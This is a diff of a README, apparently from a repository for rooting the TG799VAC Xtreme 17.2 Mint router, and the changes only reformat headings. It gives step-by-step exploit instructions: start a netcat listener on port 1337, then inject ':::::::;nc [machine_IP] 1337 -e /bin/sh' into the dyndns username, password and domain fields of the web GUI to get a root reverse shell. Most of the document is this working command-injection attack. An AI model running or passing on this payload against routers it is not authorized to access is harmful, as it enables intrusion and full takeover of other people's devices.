SuperAph1/TG799VAC-XTREME-17.2-MINT/README.md

 * Default password: root
 * You now got shell access with full root access.

-##### Copy and paste all this stuff in dyndns field in webgui (edit ip):
+- Copy and paste all this stuff in dyndns field in webgui (edit ip):

 ```sh
 ::::::;nc 192.168.1.144 1337 -e /bin/sh
 ```

-## LONG VERSION:
+/ LONG VERSION:

 ![Screenshot](files/tg799vacv2.gif)

-#### Let's begin.
+- Let's begin.
 Fire up a terminal of any kind and just run the awesome netcat tool and listen on a port:

 ```sh
 nc -lvvp 1337
 ```

-#### Go to the WAN Services and press SHOW ADVANCED.
+- Go to the WAN Services and press SHOW ADVANCED.
 In username, password and domain field you need type the below command, after this is done just enable the dyndns.
-It wont matter wich hoster you choose just pick one, press save and just wait 4-5 seconds and you have just got full root access of your TG799VAC Xtreme 17.2 Mint, check preview video above if you do not understand.
+It wont matter wich hoster you choose just pick one, press save and just wait 4-5 seconds and you have just got full root access of your TG799VAC Xtreme 17.2 Mint, check preview video above if you do not understand

 ```sh
 :::::::;nc [machine_IP] 1337 -e /bin/sh
 ```

-##### You will see something similiar and if you see this then you got root access, type ls / for example:
+- You will see something similiar and if you see this then you got root access, type ls / for example:

 ```sh
 listening on [any] 1337 ...